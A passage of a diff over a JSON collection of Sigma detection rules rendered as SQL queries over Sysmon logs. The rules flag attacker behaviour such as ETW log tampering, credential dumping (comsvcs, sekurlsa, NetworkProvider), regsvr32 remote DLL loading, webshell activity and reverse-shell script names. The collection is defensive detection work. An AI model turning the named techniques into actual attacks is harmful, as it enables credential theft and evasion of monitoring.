'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_fltmc_unload_driver.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", - "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", + "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1055.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Unknown" + "Other legitimate network providers used and not filtred in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_taidoor.yml" + "filename": "proc_creation_win_registry_new_network_provider.yml" }, { - "title": "Potential BearLPE Exploitation", - 
"id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", + "title": "PUA - NSudo Execution", + "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "status": "experimental", + "description": "Detects the use of NSudo tool for command execution", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_pua_nsudo.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Suspicious Regsvr32 HTTP IP Pattern", + "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1218.010" ], "falsepositives": [ - "Unknown" + "FQDNs that start with a number" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' 
OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_regsvr32_http_pattern.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "title": "Unusual Child Process of dns.exe", + "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "cve.2022.29072" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" + "filename": "proc_creation_win_dns_susp_child_process.yml" }, { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", + "title": "PUA- IOX Tunneling Tool Execution", + "id": "d7654f02-e04b-4934-9838-65c46f187ebc", "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 
'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_pua_iox.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", - "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "title": "MERCURY APT Activity", + "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "status": "experimental", + "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.g0069" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_apt_mercury.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "title": "Webshell Hacking Activity Patterns", + "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "status": "experimental", + 
"description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE 
'\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in 
the C:\\Users\\Public folder", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "status": "test", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects 
the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR 
Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add 
